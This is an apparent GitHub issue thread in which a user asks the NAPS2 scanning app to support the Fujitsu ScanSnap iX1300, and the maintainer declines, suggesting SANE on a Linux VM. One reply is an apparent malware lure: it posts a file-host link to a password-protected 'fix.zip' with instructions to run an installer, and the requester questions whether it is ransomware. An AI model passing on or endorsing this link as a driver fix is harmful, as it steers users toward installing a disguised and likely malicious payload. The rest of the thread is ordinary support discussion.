cyanfish/naps2 #439: Support for FUJITSU ScanSnap iX1300 scanners

lanwin, 2024-08-26:
**Is your feature request related to a problem? Please describe.**
I have a FUJITSU ScanSnap iX1300 scanner witch did not comes with WIA or TWAIN drivers. This device currently only works with the ScanSnap software and can be used via USB or Wifi.

**Describe the solution you'd like**
It would be wonderful if Naps could directly support that device too. 

It seems libSANE has support for such scanners when they are connected via USB. But I can not confirm that. There is also an Android app and most of the time its easy to decompile Android apps which makes it easier to reverse engineer the communication.  

**Describe alternatives you've considered**
The only alternative is to use the ScanSnap software. But its much more bloated and NAPS2 has a better workflow (at least for me).

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

lanwin, 2024-08-26:
@NhutDang2002 what is this? Ransomware?

cyanfish, 2024-08-26:
Looks like SANE does support it but unfortunately SANE doesn't work well on Windows. And implementing non-standard drivers is beyond the scope of this project.

If you really want you could install a Linux VM and use NAPS2 on Linux with SANE.

closed 2024-09-04 by cyanfish